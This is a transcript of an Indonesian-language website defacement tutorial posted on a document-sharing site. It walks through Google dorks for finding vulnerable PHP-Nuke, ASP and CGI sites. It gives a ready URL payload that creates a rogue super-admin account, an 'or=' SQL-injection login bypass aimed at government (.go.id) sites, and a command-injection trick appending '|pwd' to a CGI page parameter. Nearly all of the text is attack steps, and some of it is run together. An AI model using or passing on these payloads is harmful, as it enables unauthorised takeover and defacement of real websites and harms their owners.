tutorial deface berbagai cara

Download Tutorial Deface Berbagai Cara

If you can't read please download the document

Upload: bom-boman

Post on 14-Sep-2015

223 views

Category:

Documents


5 download

DESCRIPTION

tutorial

TRANSCRIPT

Deface situs php nuke pakai google. Coba search di google:.com/nuke/index.php atau .org/nuke/index.phpJika sudah ditemukan targetnya, tinggal ikuti langkah berikut :1. http://www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)2. Masukkan bug ini di belakang situs tadi : ?op=AddAuthor&add_aid=smartbekantan&add_name=God&add_pwd=render07&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjoxmisalnya : http://www.target.com/nuke/admin.php?http://www.target.com/nuke/admin.php?op=AddAuthor&add_aid=smartbekantan&add_name=God&add_pwd=render07&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjoxJika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.Tapi jika berhasil, maka di url/browsing akan muncul http://www.target.com/nuke/admin.php?op=mod_author4. Login, dan masukan id & password tadi.Masih ingat kan ?id=smartbekantan => liat yg diatas tadipassword=render07 => liat yg diatas tadi. Nah kita sekarang sudah masuk ke Administration Menu situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut.Deface asp dengan sql injection1. buka browsing/url http://www.google.co.id2. ketik site:go.id login.aspmisal nya kita dapat target http://www.situstarget.com/login.asp3. username dan pass ketik or=4. buka satu persatu file yg ada disana5. cari file yg bisa kita ubah/deface6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html allinurl*.cgi *page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=Ntarget harus file .html diujungnya jika ingin ditambah |pwd|